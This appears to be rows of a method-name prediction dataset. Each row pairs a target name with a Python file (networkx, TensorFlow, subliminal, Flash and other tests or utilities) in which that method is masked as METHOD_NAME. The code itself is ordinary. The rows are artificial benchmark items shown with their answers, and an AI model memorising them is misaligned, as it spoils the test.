assert H is not H2 # they should be different graphs
assert nodes_equal(list(H), list(G))
assert edges_equal(list(H.edges()), list(G.edges()))
os.close(fd)
os.unlink(fname)
def test_empty_digraph(self):
with pytest.raises(nx.NetworkXNotImplemented):
bytesIO = io.BytesIO()
bipartite.write_edgelist(nx.DiGraph(), bytesIO)
def test_raise_attribute(self):
with pytest.raises(AttributeError):
G = nx.path_graph(4)
bytesIO = io.BytesIO()
bipartite.write_edgelist(G, bytesIO)
def test_parse_edgelist(self):
"""Tests for conditions specific to
parse_edge_list method"""
# ignore strings of length less than 2
lines = ["1 2", "2 3", "3 1", "4", " "]
G = bipartite.parse_edgelist(lines, nodetype=int)
assert list(G.nodes) == [1, 2, 3]
# Exception raised when node is not convertible
# to specified data type
with pytest.raises(TypeError, match=".*Failed to convert nodes"):
lines = ["a b", "b c", "c a"]
G = bipartite.parse_edgelist(lines, nodetype=int)
# Exception raised when format of data is not
# convertible to dictionary object
with pytest.raises(TypeError, match=".*Failed to convert edge data"):
lines = ["1 2 3", "2 3 4", "3 1 2"]
G = bipartite.parse_edgelist(lines, nodetype=int)
# Exception raised when edge data and data
# keys are not of same length
with pytest.raises(IndexError):
lines = ["1 2 3 4", "2 3 4"]
G = bipartite.parse_edgelist(
lines, nodetype=int, data=[("weight", int), ("key", int)]
)
# Exception raised when edge data is not
# convertible to specified data type
with pytest.raises(TypeError, match=".*Failed to convert key data"):
lines = ["1 2 3 a", "2 3 4 b"]
G = bipartite.parse_edgelist(
lines, nodetype=int, data=[("weight", int), ("key", int)]
) |
298,415 | sum values and sync | #################################################################################
# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,
# National Renewable Energy Laboratory, and National Energy Technology
# Laboratory (subject to receipt of any required approvals from the U.S. Dept.
# of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#################################################################################
import numpy
from concurrent import futures
from watertap.tools.parallel.results import LocalResults
from watertap.tools.parallel.parallel_manager import build_and_execute, ParallelManager
class ConcurrentFuturesParallelManager(ParallelManager):
def __init__(self, number_of_subprocesses=1, **kwargs):
self.max_number_of_subprocesses = number_of_subprocesses
# this will be updated when child processes are kicked off
self.actual_number_of_subprocesses = None
# Future -> (process number, parameters). Used to keep track of the process number and parameters for
# all in-progress futures
self.running_futures = dict()
def is_root_process(self):
return True
def get_rank(self):
return self.ROOT_PROCESS_RANK
def number_of_worker_processes(self):
if self.actual_number_of_subprocesses is None:
return self.max_number_of_subprocesses
return self.actual_number_of_subprocesses
def sync_with_peers(self):
pass
def sync_array_with_peers(self, data):
pass
def sync_pyobject_with_peers(self, obj):
return obj
def combine_data_with_peers(self, data):
return [data]
def METHOD_NAME(self, sendbuf, recvbuf):
recvbuf[0][:] = sendbuf[0][:]
def gather_arrays_to_root(self, sendbuf, recvbuf_spec):
receive_arr = recvbuf_spec[0]
receive_sizes = recvbuf_spec[1]
assert len(receive_arr) == sum(
receive_sizes
), "Gathering arrays to root cannot be done with mismatched sizes"
receive_arr[:] = sendbuf[:]
def scatter(
self,
do_build,
do_build_kwargs,
do_execute,
all_parameters,
):
# constrain the number of child processes to the number of unique values to be run
self.actual_number_of_subprocesses = min(
self.max_number_of_subprocesses, len(all_parameters)
)
# split the parameters into chunks, one for each child process
divided_parameters = numpy.array_split(
all_parameters, self.actual_number_of_subprocesses
)
# create an executor and kick off the child processes that will perform the computation
self.executor = futures.ProcessPoolExecutor(
max_workers=self.actual_number_of_subprocesses
)
for i in range(self.actual_number_of_subprocesses):
local_parameters = divided_parameters[i]
# save the mapping of future -> (process number, params that it's running)
self.running_futures[
self.executor.submit(
build_and_execute,
do_build,
do_build_kwargs,
do_execute,
local_parameters,
)
] = (i, local_parameters)
def gather(self):
results = []
try:
execution_results = futures.wait(self.running_futures.keys())
for future in execution_results.done:
process_number, values = self.running_futures[future]
results.append(LocalResults(process_number, values, future.result()))
if len(execution_results.not_done) > 0:
print(
f"{len(execution_results.not_done)} out of {len(self.running_futures.keys())} total subprocesses did not finish and provide results"
)
finally:
self.executor.shutdown()
# sort the results by the process number to keep a deterministic ordering
results.sort(key=lambda result: result.process_number)
return results
def results_from_local_tree(self, results):
return results |
298,416 | test run module command exit on error | """Test runway.module.utils."""
# pylint: disable=unused-argument
# pyright: basic
from __future__ import annotations
from pathlib import Path
from subprocess import CalledProcessError
from typing import TYPE_CHECKING, Any, List
import pytest
from runway.module.utils import (
NPM_BIN,
NPX_BIN,
format_npm_command_for_logging,
generate_node_command,
run_module_command,
use_npm_ci,
)
if TYPE_CHECKING:
from pytest_mock import MockerFixture
from pytest_subprocess import FakeProcess
MODULE = "runway.module.utils"
@pytest.mark.parametrize(
"command, expected",
[
(["npx.cmd", "-c", "hello-world"], "npx.cmd -c hello-world"),
(["npx", "-c", "hello-world"], "npx -c hello-world"),
(["npm.cmd", "hello-world"], "npm.cmd hello-world"),
(["npm", "hello-world"], "npm hello-world"),
],
)
def test_format_npm_command_for_logging_darwin(
command: List[str], expected: str, platform_darwin: None
) -> None:
"""Test format_npm_command_for_logging on Darwin/macOS."""
assert format_npm_command_for_logging(command) == expected
@pytest.mark.parametrize(
"command, expected",
[
(["npx.cmd", "-c", "hello-world"], 'npx.cmd -c "hello-world"'),
(["npx", "-c", "hello-world"], "npx -c hello-world"),
(["npm.cmd", "hello-world"], "npm.cmd hello-world"),
(["npm", "hello-world"], "npm hello-world"),
],
)
def test_format_npm_command_for_logging_windows(
command: List[str], expected: str, platform_windows: None
) -> None:
"""Test format_npm_command_for_logging on windows."""
assert format_npm_command_for_logging(command) == expected
@pytest.mark.parametrize(
"command, opts", [("test", []), ("test", ["arg1"]), ("test", ["arg1", "arg2"])]
)
def test_generate_node_command(
command: str, mocker: MockerFixture, opts: List[str], tmp_path: Path
) -> None:
"""Test generate_node_command."""
mock_which = mocker.patch(f"{MODULE}.which", return_value=False)
assert generate_node_command(command, opts, tmp_path) == [
str(tmp_path / "node_modules" / ".bin" / command),
*opts,
]
mock_which.assert_called_once_with(NPX_BIN)
@pytest.mark.parametrize(
"command, opts, expected",
[
("test", [], [NPX_BIN, "-c", "test"]),
("test", ["arg1"], [NPX_BIN, "-c", "test arg1"]),
("test", ["arg1", "arg2"], [NPX_BIN, "-c", "test arg1 arg2"]),
],
)
def test_generate_node_command_npx(
command: str,
expected: List[str],
mocker: MockerFixture,
opts: List[str],
tmp_path: Path,
) -> None:
"""Test generate_node_command."""
mock_which = mocker.patch(f"{MODULE}.which", return_value=True)
assert generate_node_command(command, opts, tmp_path) == expected
mock_which.assert_called_once_with(NPX_BIN)
def test_generate_node_command_npx_package(
mocker: MockerFixture, tmp_path: Path
) -> None:
"""Test generate_node_command."""
mock_which = mocker.patch(f"{MODULE}.which", return_value=True)
assert generate_node_command(
command="cdk",
command_opts=["--context", "key=val"],
package="aws-cdk",
path=tmp_path,
) == [NPX_BIN, "--package", "aws-cdk", "cdk", "--context", "key=val"]
mock_which.assert_called_once_with(NPX_BIN)
def test_run_module_command_called_process_error(fake_process: FakeProcess) -> None:
"""Test run_module_command raise CalledProcessError."""
cmd = ["test"]
fake_process.register_subprocess(cmd, returncode=1) # type: ignore
with pytest.raises(CalledProcessError):
run_module_command(cmd, {}, exit_on_error=False)
assert fake_process.call_count(cmd) == 1 # type: ignore
def METHOD_NAME(
fake_process: FakeProcess,
) -> None:
"""Test run_module_command raise SystemExit."""
cmd = ["test"]
fake_process.register_subprocess(cmd, returncode=1) # type: ignore
with pytest.raises(SystemExit):
run_module_command(cmd, {})
assert fake_process.call_count(cmd) == 1 # type: ignore
def test_run_module_command_exit_on_error(fake_process: FakeProcess) -> None:
"""Test run_module_command exit_on_error no error."""
cmd = ["test"]
fake_process.register_subprocess(cmd, returncode=0) # type: ignore
assert not run_module_command(cmd, {})
assert fake_process.call_count(cmd) == 1 # type: ignore
def test_run_module_command(fake_process: FakeProcess) -> None:
"""Test run_module_command."""
cmd = ["test"]
fake_process.register_subprocess(cmd, returncode=0) # type: ignore
assert not run_module_command(cmd, {}, exit_on_error=False)
assert fake_process.call_count(cmd) == 1 # type: ignore
@pytest.mark.parametrize(
"has_lock, has_shrinkwrap, exit_code, expected",
[
(False, False, 0, False),
(False, False, 1, False),
(True, False, 1, False),
(False, True, 1, False),
(True, True, 1, False),
(True, False, 0, True),
(False, True, 0, True),
(True, True, 0, True),
],
)
def test_use_npm_ci(
exit_code: int,
expected: bool,
fake_process: FakeProcess,
has_lock: bool,
has_shrinkwrap: bool,
tmp_path: Path,
) -> None:
"""Test use_npm_ci."""
if has_lock:
(tmp_path / "package-lock.json").touch()
if has_shrinkwrap:
(tmp_path / "package-lock.json").touch()
cmd: List[Any] = [NPM_BIN, "ci", "-h"]
fake_process.register_subprocess(cmd, returncode=exit_code)
assert use_npm_ci(tmp_path) is expected
if has_lock or has_shrinkwrap:
assert fake_process.call_count(cmd) == 1
else:
assert fake_process.call_count(cmd) == 0 |
298,417 | skip double triangle buttons | import asyncio
from contextlib import suppress
import discord
from redbot.core.utils import chat_formatting as chat
from redbot.core.utils.predicates import MessagePredicate
from redbot.vendored.discord.ext import menus
from tabulate import tabulate
class TopMenu(menus.MenuPages, inherit_buttons=False):
def __init__(
self,
source: menus.PageSource,
timeout: int = 30,
):
super().__init__(
source,
timeout=timeout,
clear_reactions_after=True,
delete_message_after=True,
)
def METHOD_NAME(self):
return super().METHOD_NAME()
async def finalize(self, timed_out):
"""|coro|
A coroutine that is called when the menu loop has completed
its run. This is useful if some asynchronous clean-up is
required after the fact.
Parameters
--------------
timed_out: :class:`bool`
Whether the menu completed due to timing out.
"""
if timed_out and self.delete_message_after:
self.delete_message_after = False
@menus.button(
"\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}\ufe0f",
position=menus.First(0),
skip_if=METHOD_NAME,
)
async def go_to_first_page(self, payload):
"""go to the first page"""
await self.show_page(0)
@menus.button("\N{BLACK LEFT-POINTING TRIANGLE}\ufe0f", position=menus.First(1))
async def go_to_previous_page(self, payload):
"""go to the previous page"""
if self.current_page == 0:
await self.show_page(self._source.get_max_pages() - 1)
else:
await self.show_checked_page(self.current_page - 1)
@menus.button("\N{BLACK RIGHT-POINTING TRIANGLE}\ufe0f", position=menus.Last(0))
async def go_to_next_page(self, payload):
"""go to the next page"""
if self.current_page == self._source.get_max_pages() - 1:
await self.show_page(0)
else:
await self.show_checked_page(self.current_page + 1)
@menus.button(
"\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}\ufe0f",
position=menus.Last(1),
skip_if=METHOD_NAME,
)
async def go_to_last_page(self, payload):
"""go to the last page"""
# The call here is safe because it's guarded by skip_if
await self.show_page(self._source.get_max_pages() - 1)
@menus.button("\N{NUMBER SIGN}\ufe0f\N{COMBINING ENCLOSING KEYCAP}", position=menus.Last(2))
async def number_page(self, payload):
prompt = await self.ctx.send("Send a number of page that you wish to see")
try:
pred = MessagePredicate.positive(self.ctx)
msg = await self.bot.wait_for(
"message_without_command",
check=pred,
timeout=10.0,
)
if pred.result:
jump_page = int(msg.content)
if jump_page > self._source.get_max_pages():
jump_page = self._source.get_max_pages()
await self.show_checked_page(jump_page - 1)
if self.ctx.channel.permissions_for(self.ctx.me).manage_messages:
with suppress(discord.HTTPException):
await msg.delete()
except asyncio.TimeoutError:
pass
finally:
with suppress(discord.HTTPException):
await prompt.delete()
@menus.button("\N{CROSS MARK}", position=menus.First(2))
async def stop_pages(self, payload: discord.RawReactionActionEvent) -> None:
self.stop()
class TopPager(menus.ListPageSource):
def __init__(
self, entries, board_type: str, is_level: bool, user_stats: list, icon_url: str, title: str
):
super().__init__(entries, per_page=15)
self.board_type = board_type
self.is_level = is_level
self.user = user_stats
self.icon_url = icon_url
self.title = title
async def format_page(self, menu: TopMenu, entries):
table = tabulate(
entries,
headers=["#", self.board_type, "Level", "Username"]
if self.is_level
else ["#", self.board_type, "Username"],
tablefmt="rst",
)
table_width = len(table.splitlines()[0])
msg = ""
msg += "[Page {}/{}]".format(menu.current_page + 1, self.get_max_pages()).rjust(
table_width
)
msg += "\n"
msg += table
msg += "\n"
if self.user:
msg += "Your rank: {}".format(self.user[0]).rjust(table_width)
msg += "\n"
msg += "{}: {}".format(self.board_type, self.user[1]).rjust(table_width)
msg += "\n"
embed = discord.Embed(color=await menu.ctx.embed_color(), description=chat.box(msg))
embed.set_author(name=self.title, icon_url=self.icon_url)
return embed |
298,418 | stats blockdev | import datetime
import os
from env import Env
from utilities.proc import call, which
from utilities.stats.provider import provider
today = datetime.datetime.today()
yesterday = today - datetime.timedelta(days=1)
class StatsProvider(provider.BaseStatsProviderUx):
"""Not yet implemented"""
pass
def sarfile(day):
f = os.path.join(os.sep, 'var', 'adm', 'sa', 'sa' + day)
if os.path.exists(f):
return f
return None
def twodays(fn):
if which('sar') is None:
return []
lines = fn(yesterday)
lines += fn(today)
return lines
def stats_cpu():
return twodays(stats_cpu_day)
def stats_cpu_day(t):
d = t.strftime("%Y-%m-%d")
day = t.strftime("%d")
f = sarfile(day)
if f is None:
return []
cmd = ['sar', '-u', '-P', 'ALL', '-f', f]
(ret, buff, err) = call(cmd, errlog=False)
lines = []
for line in buff.split('\n'):
l = line.split()
if len(l) != 6:
continue
if l[1] == '%usr':
continue
if l[0] == 'Average':
continue
# SunOS: date %usr %sys %wio %idle
# xmlrpc: date cpu usr nice sys iowait steal irq soft guest idle nodename
x = ['%s %s' % (d, l[0]), 'all', '0', '0', '0', '0', '0', '0', '0', '0', '0', Env.nodename]
x[1] = l[1].replace('-', 'all')
x[2] = l[2]
x[4] = l[3]
x[5] = l[4]
x[10] = l[5]
lines.append(x)
return lines
def stats_mem_u(file, collect_date=None):
return twodays(stats_mem_u_day)
def stats_mem_u_day(t):
return []
def stats_proc(file, collect_date=None):
return twodays(stats_proc_day)
def stats_proc_day(t):
d = t.strftime("%Y-%m-%d")
day = t.strftime("%d")
f = sarfile(day)
if f is None:
return []
cmd = ['sar', '-q', '-f', f]
(ret, buff, err) = call(cmd)
lines = []
for line in buff.split('\n'):
l = line.split()
if len(l) < 3:
continue
if ':' not in l[0]:
continue
""" xmlrpc: date runq_sz plist_sz ldavg_1 ldavg_5 ldavg_15 nodename
"""
x = ['%s %s' % (d, l[0]), l[1], '0', '0', '0', '0', Env.nodename]
lines.append(x)
return lines
def stats_swap(file, collect_date=None):
return twodays(stats_swap_day)
def stats_swap_day(t):
return []
def stats_block(file, collect_date=None):
return twodays(stats_block_day)
def stats_block_day(t):
d = t.strftime("%Y-%m-%d")
day = t.strftime("%d")
f = sarfile(day)
if f is None:
return []
cmd = ['sar', '-b', '-f', f]
(ret, buff, err) = call(cmd)
lines = []
for line in buff.split('\n'):
l = line.split()
if len(l) != 9:
continue
if ':' not in l[1]:
continue
""" xmlrpc: date tps rtps wtps rbps wbps nodename
"""
x = ['%s %s' % (d, l[0]), '0', '0', '0', l[1], l[4], Env.nodename]
lines.append(x)
return lines
def METHOD_NAME(file, collect_date=None):
return twodays(stats_blockdev_day)
def stats_blockdev_day(t):
d = t.strftime("%Y-%m-%d")
day = t.strftime("%d")
f = sarfile(day)
if f is None:
return []
cmd = ['sar', '-d', '-f', f]
(ret, buff, err) = call(cmd, errlog=False)
lines = []
last_date = '00:00:00'
for line in buff.split('\n'):
l = line.split()
if len(l) == 8:
last_date = l[0]
if len(l) == 7:
l = [last_date] + l
if len(l) != 8:
continue
if l[1] == 'device':
continue
if l[0] == 'Average':
continue
""" xmlrpc: 22:05:01 DEV tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %util
00:00:00 device %busy avque r+w/s blks/s avwait avserv
"""
x = ['%s %s' % (d, l[0]), l[1], l[4], '0', '0', '0', l[3], l[6], l[7], l[2], Env.nodename]
lines.append(x)
return lines
def stats_netdev(file, collect_date=None):
return twodays(stats_netdev_day)
def stats_netdev_day(t):
return []
def stats_netdev_err(file, collect_date=None):
return twodays(stats_netdev_err_day)
def stats_netdev_err_day(t):
return [] |
298,419 | test pandas feeding multi thread | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests `FeedingQueueRunner` using arrays and `DataFrames`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.estimator.inputs.queues.feeding_functions import _enqueue_data as enqueue_data
from tensorflow.python.framework import ops
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner_impl
# pylint: disable=g-import-not-at-top
try:
import pandas as pd
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
def get_rows(array, row_indices):
rows = [array[i] for i in row_indices]
return np.vstack(rows)
class FeedingQueueRunnerTestCase(test.TestCase):
"""Tests for `FeedingQueueRunner`."""
def testArrayFeeding(self):
with ops.Graph().as_default():
array = np.arange(32).reshape([16, 2])
q = enqueue_data(array, capacity=100)
batch_size = 3
dq_op = q.dequeue_many(batch_size)
with session.Session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
for i in range(100):
indices = [
j % array.shape[0]
for j in range(batch_size * i, batch_size * (i + 1))
]
expected_dq = get_rows(array, indices)
dq = sess.run(dq_op)
np.testing.assert_array_equal(indices, dq[0])
np.testing.assert_array_equal(expected_dq, dq[1])
coord.request_stop()
coord.join(threads)
def testArrayFeedingMultiThread(self):
with ops.Graph().as_default():
array = np.arange(256).reshape([128, 2])
q = enqueue_data(array, capacity=128, num_threads=8, shuffle=True)
batch_size = 3
dq_op = q.dequeue_many(batch_size)
with session.Session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
for _ in range(100):
dq = sess.run(dq_op)
indices = dq[0]
expected_dq = get_rows(array, indices)
np.testing.assert_array_equal(expected_dq, dq[1])
coord.request_stop()
coord.join(threads)
def testPandasFeeding(self):
if not HAS_PANDAS:
return
with ops.Graph().as_default():
array1 = np.arange(32)
array2 = np.arange(32, 64)
df = pd.DataFrame({"a": array1, "b": array2}, index=np.arange(64, 96))
q = enqueue_data(df, capacity=100)
batch_size = 5
dq_op = q.dequeue_many(5)
with session.Session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
for i in range(100):
indices = [
j % array1.shape[0]
for j in range(batch_size * i, batch_size * (i + 1))
]
expected_df_indices = df.index[indices]
expected_rows = df.iloc[indices]
dq = sess.run(dq_op)
np.testing.assert_array_equal(expected_df_indices, dq[0])
for col_num, col in enumerate(df.columns):
np.testing.assert_array_equal(expected_rows[col].values,
dq[col_num + 1])
coord.request_stop()
coord.join(threads)
def METHOD_NAME(self):
if not HAS_PANDAS:
return
with ops.Graph().as_default():
array1 = np.arange(128, 256)
array2 = 2 * array1
df = pd.DataFrame({"a": array1, "b": array2}, index=np.arange(128))
q = enqueue_data(df, capacity=128, num_threads=8, shuffle=True)
batch_size = 5
dq_op = q.dequeue_many(batch_size)
with session.Session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
for _ in range(100):
dq = sess.run(dq_op)
indices = dq[0]
expected_rows = df.iloc[indices]
for col_num, col in enumerate(df.columns):
np.testing.assert_array_equal(expected_rows[col].values,
dq[col_num + 1])
coord.request_stop()
coord.join(threads)
if __name__ == "__main__":
test.main() |
298,420 | streaming service matches | # -*- coding: utf-8 -*-
from rebulk.loose import ensure_list
from .score import get_equivalent_release_groups, score_keys
from .video import Episode, Movie
from .utils import sanitize, sanitize_release_group
def series_matches(video, title=None, **kwargs):
"""Whether the `video` matches the series title.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param str title: the series name.
:return: whether there's a match
:rtype: bool
"""
if isinstance(video, Episode):
return video.series and sanitize(title) in (
sanitize(name) for name in [video.series] + video.alternative_series
)
def title_matches(video, title=None, episode_title=None, **kwargs):
"""Whether the movie matches the movie `title` or the series matches the `episode_title`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param str title: the movie title.
:param str episode_title: the series episode title.
:return: whether there's a match
:rtype: bool
"""
if isinstance(video, Episode):
return video.title and sanitize(episode_title) == sanitize(video.title)
if isinstance(video, Movie):
return video.title and sanitize(title) == sanitize(video.title)
def season_matches(video, season=None, **kwargs):
"""Whether the episode matches the `season`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param int season: the episode season.
:return: whether there's a match
:rtype: bool
"""
if isinstance(video, Episode):
return video.season and season == video.season
def episode_matches(video, episode=None, **kwargs):
"""Whether the episode matches the `episode`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param episode: the episode season.
:type: list of int or int
:return: whether there's a match
:rtype: bool
"""
if isinstance(video, Episode):
return video.episodes and ensure_list(episode) == video.episodes
def year_matches(video, year=None, partial=False, **kwargs):
"""Whether the video matches the `year`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param int year: the video year.
:param bool partial: whether or not the guess is partial.
:return: whether there's a match
:rtype: bool
"""
if video.year and year == video.year:
return True
if isinstance(video, Episode):
# count "no year" as an information
return not partial and video.original_series and not year
def country_matches(video, country=None, partial=False, **kwargs):
"""Whether the video matches the `country`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param country: the video country.
:type country: :class:`~babelfish.country.Country`
:param bool partial: whether or not the guess is partial.
:return: whether there's a match
:rtype: bool
"""
if video.country and country == video.country:
return True
if isinstance(video, Episode):
# count "no country" as an information
return not partial and video.original_series and not country
if isinstance(video, Movie):
# count "no country" as an information
return not video.country and not country
def release_group_matches(video, release_group=None, **kwargs):
"""Whether the video matches the `release_group`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param str release_group: the video release group.
:return: whether there's a match
:rtype: bool
"""
return (video.release_group and release_group and
any(r in sanitize_release_group(release_group)
for r in get_equivalent_release_groups(sanitize_release_group(video.release_group))))
def METHOD_NAME(video, streaming_service=None, **kwargs):
"""Whether the video matches the `streaming_service`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param str streaming_service: the video streaming service
:return: whether there's a match
:rtype: bool
"""
return video.streaming_service and streaming_service == video.streaming_service
def resolution_matches(video, screen_size=None, **kwargs):
"""Whether the video matches the `resolution`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param str screen_size: the video resolution
:return: whether there's a match
:rtype: bool
"""
return video.resolution and screen_size == video.resolution
def source_matches(video, source=None, **kwargs):
"""Whether the video matches the `source`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param str source: the video source
:return: whether there's a match
:rtype: bool
"""
return video.source and source == video.source
def video_codec_matches(video, video_codec=None, **kwargs):
"""Whether the video matches the `video_codec`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param str video_codec: the video codec
:return: whether there's a match
:rtype: bool
"""
return video.video_codec and video_codec == video.video_codec
def audio_codec_matches(video, audio_codec=None, **kwargs):
"""Whether the video matches the `audio_codec`.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param str audio_codec: the video audio codec
:return: whether there's a match
:rtype: bool
"""
return video.audio_codec and audio_codec == video.audio_codec
#: Available matches functions
matches_manager = {
'series': series_matches,
'title': title_matches,
'season': season_matches,
'episode': episode_matches,
'year': year_matches,
'country': country_matches,
'release_group': release_group_matches,
'streaming_service': METHOD_NAME,
'resolution': resolution_matches,
'source': source_matches,
'video_codec': video_codec_matches,
'audio_codec': audio_codec_matches
}
def guess_matches(video, guess, partial=False):
"""Get matches between a `video` and a `guess`.
If a guess is `partial`, the absence information won't be counted as a match.
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param guess: the guess.
:type guess: dict
:param bool partial: whether or not the guess is partial.
:return: matches between the `video` and the `guess`.
:rtype: set
"""
matches = set()
for key in score_keys:
if key in matches_manager and matches_manager[key](video, partial=partial, **guess):
matches.add(key)
return matches |
298,421 | check forward output | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import os
from typing import Any
import numpy as np
import pytest
import torch
from flash import Trainer
from flash.core.data.io.input import DataKeys
from flash.core.utilities.imports import _ICEDATA_AVAILABLE, _ICEVISION_AVAILABLE, _TOPIC_IMAGE_AVAILABLE
from flash.image import KeypointDetectionData, KeypointDetector
from tests.helpers.task_tester import TaskTester
if _TOPIC_IMAGE_AVAILABLE:
from PIL import Image
COCODataConfig = collections.namedtuple("COCODataConfig", "train_folder train_ann_file predict_folder")
@pytest.fixture()
def coco_keypoints(tmpdir):
rand_image = Image.fromarray(np.random.randint(0, 255, (64, 64, 3), dtype="uint8"))
os.makedirs(tmpdir / "train_folder", exist_ok=True)
os.makedirs(tmpdir / "predict_folder", exist_ok=True)
train_folder = tmpdir / "train_folder"
train_ann_file = tmpdir / "train_annotations.json"
predict_folder = tmpdir / "predict_folder"
_ = [rand_image.save(str(train_folder / f"image_{i}.png")) for i in range(1, 4)]
_ = [rand_image.save(str(predict_folder / f"predict_image_{i}.png")) for i in range(1, 4)]
annotations = {
"annotations": [
{
"area": 50,
"bbox": [10, 20, 5, 10],
"num_keypoints": 2,
"keypoints": [10, 15, 2, 20, 30, 2],
"category_id": 1,
"id": 1,
"image_id": 1,
"iscrowd": 0,
},
{
"area": 100,
"bbox": [20, 30, 10, 10],
"num_keypoints": 2,
"keypoints": [20, 30, 2, 30, 40, 2],
"category_id": 2,
"id": 2,
"image_id": 2,
"iscrowd": 0,
},
{
"area": 125,
"bbox": [10, 20, 5, 25],
"num_keypoints": 2,
"keypoints": [10, 15, 2, 20, 45, 2],
"category_id": 1,
"id": 3,
"image_id": 3,
"iscrowd": 0,
},
],
"categories": [
{"id": 1, "name": "cat", "supercategory": "cat", "keypoints": ["left ear", "right ear"]},
{"id": 2, "name": "dog", "supercategory": "dog", "keypoints": ["left ear", "right ear"]},
],
"images": [
{"file_name": "image_1.png", "height": 64, "width": 64, "id": 1},
{"file_name": "image_2.png", "height": 64, "width": 64, "id": 2},
{"file_name": "image_3.png", "height": 64, "width": 64, "id": 3},
],
}
with open(train_ann_file, "w") as annotation_file:
json.dump(annotations, annotation_file)
return COCODataConfig(train_folder, train_ann_file, predict_folder)
@pytest.mark.skipif(not _ICEDATA_AVAILABLE, reason="icedata is not installed for testing")
@pytest.mark.skipif(not _ICEVISION_AVAILABLE, reason="icevision is not installed for testing")
class TestKeypointDetector(TaskTester):
task = KeypointDetector
task_args = (2,)
task_kwargs = {"num_classes": 2}
cli_command = "keypoint_detection"
is_testing = _TOPIC_IMAGE_AVAILABLE
is_available = _TOPIC_IMAGE_AVAILABLE and _ICEVISION_AVAILABLE
# TODO: Resolve JIT support
traceable = False
scriptable = False
@property
def example_forward_input(self):
return torch.rand(1, 3, 32, 32)
def METHOD_NAME(self, output: Any):
assert {"keypoints", "labels", "scores"} <= output[0].keys()
@property
def example_train_sample(self):
return {
DataKeys.INPUT: torch.rand(3, 224, 224),
DataKeys.TARGET: {
"bboxes": [
{"xmin": 10, "ymin": 10, "width": 20, "height": 20},
{"xmin": 30, "ymin": 30, "width": 40, "height": 40},
],
"labels": [0, 1],
"keypoints": [
[{"x": 10, "y": 10, "visible": 1}],
[{"x": 10, "y": 10, "visible": 1}],
],
},
}
@property
def example_val_sample(self):
return self.example_train_sample
@property
def example_test_sample(self):
return self.example_train_sample
@pytest.mark.skipif(not _TOPIC_IMAGE_AVAILABLE, reason="image libraries aren't installed.")
@pytest.mark.parametrize(("backbone", "head"), [("resnet18_fpn", "keypoint_rcnn")])
def test_model(coco_keypoints, backbone, head):
datamodule = KeypointDetectionData.from_coco(
train_folder=coco_keypoints.train_folder,
train_ann_file=coco_keypoints.train_ann_file,
predict_folder=coco_keypoints.predict_folder,
transform_kwargs={"image_size": (128, 128)},
batch_size=2,
)
assert datamodule.num_classes == 3
assert datamodule.labels == ["background", "cat", "dog"]
model = KeypointDetector(2, num_classes=datamodule.num_classes, backbone=backbone, head=head)
trainer = Trainer(fast_dev_run=True)
trainer.fit(model, datamodule=datamodule)
trainer.predict(model, datamodule=datamodule) |
298,422 | get dashboards id | from _typeshed import Incomplete
from influxdb_client.service._base_service import _BaseService
class DashboardsService(_BaseService):
def __init__(self, api_client: Incomplete | None = None) -> None: ...
def delete_dashboards_id(self, dashboard_id, **kwargs): ...
def delete_dashboards_id_with_http_info(self, dashboard_id, **kwargs): ...
async def delete_dashboards_id_async(self, dashboard_id, **kwargs): ...
def delete_dashboards_id_cells_id(self, dashboard_id, cell_id, **kwargs): ...
def delete_dashboards_id_cells_id_with_http_info(self, dashboard_id, cell_id, **kwargs): ...
async def delete_dashboards_id_cells_id_async(self, dashboard_id, cell_id, **kwargs): ...
def delete_dashboards_id_labels_id(self, dashboard_id, label_id, **kwargs): ...
def delete_dashboards_id_labels_id_with_http_info(self, dashboard_id, label_id, **kwargs): ...
async def delete_dashboards_id_labels_id_async(self, dashboard_id, label_id, **kwargs): ...
